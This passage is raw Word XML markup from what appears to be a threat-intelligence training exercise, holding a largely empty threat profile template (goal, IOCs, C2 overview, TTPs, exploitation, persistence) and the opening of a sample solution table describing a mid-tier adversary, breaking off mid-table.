        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId184" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>MALWAREMUSTDIE</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:hyperlink r:id="rId185" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://pastebin.com/qCdMwtZ6</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7829AA96" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>THREAT PROFILE TEMPLATE</w:t>
      </w:r>
      <w:hyperlink r:id="rId186" w:anchor="threat-profile-template" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7675"/>
        <w:gridCol w:w="1351"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="31DD1B47" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71822A7C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29A4C9C4" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="54B7ABBB" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A6C39AE" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74ED753D" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="36F1BFA7" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="25440777" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Goal and Intent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DDF349A" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="0B528B89" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73523CFC" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Key IOCs</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34FA8F27" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="56FF7FC6" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="78BFBB5E" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>C2 Overview</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E83F29E" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="39044B05" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="22D5A9D2" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>TTPs (Enumeration, Delivery, Lateral Movement, Privilege Escalation, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="79E09D6D" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="23DDF21E" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74BED25C" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="57990191" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="486094CD" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="149E2598" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1214F0A5" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3C39526A" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:pict w14:anchorId="27E38BE3">
          <v:rect id="_x0000_i1157" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hrnoshade="t" o:hr="t" fillcolor="#1c1e21" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E1B9375" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t xml:space="preserve">!! Stop </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>Here !!</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="02F4DF60" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Do not continue until ready for a possible solution.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="072A20B3" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="763516B1" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>POSSIBLE SOLUTION</w:t>
      </w:r>
      <w:hyperlink r:id="rId187" w:anchor="possible-solution" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6DB486D0" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008" w:rsidP="00BB5008">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB5008">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:caps/>
          <w:color w:val="1C1E21"/>
        </w:rPr>
        <w:t>THREAT PROFILE EXAMPLE</w:t>
      </w:r>
      <w:hyperlink r:id="rId188" w:anchor="threat-profile-example-1" w:tooltip="Direct link to heading" w:history="1">
        <w:r w:rsidRPr="00BB5008">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:caps/>
          </w:rPr>
          <w:t>​</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblCellMar>
          <w:top w:w="15" w:type="dxa"/>
          <w:left w:w="15" w:type="dxa"/>
          <w:bottom w:w="15" w:type="dxa"/>
          <w:right w:w="15" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2816"/>
        <w:gridCol w:w="6210"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="0D951254" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="41A4DAAA" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C658465" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="42164D7C" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2AECC8E7" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58E41C16" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>General mid-tiered threat that uses common offensive tools and techniques.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BB5008" w:rsidRPr="00BB5008" w14:paraId="3FD01113" w14:textId="77777777" w:rsidTr="00BB5008">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6CA7718D" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Goal and Intent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6EBC1073" w14:textId="77777777" w:rsidR="00BB5008" w:rsidRPr="00BB5008" w:rsidRDefault="00BB5008">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
                <w:color w:val="1C1E21"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BB5008">
              <w:rPr>
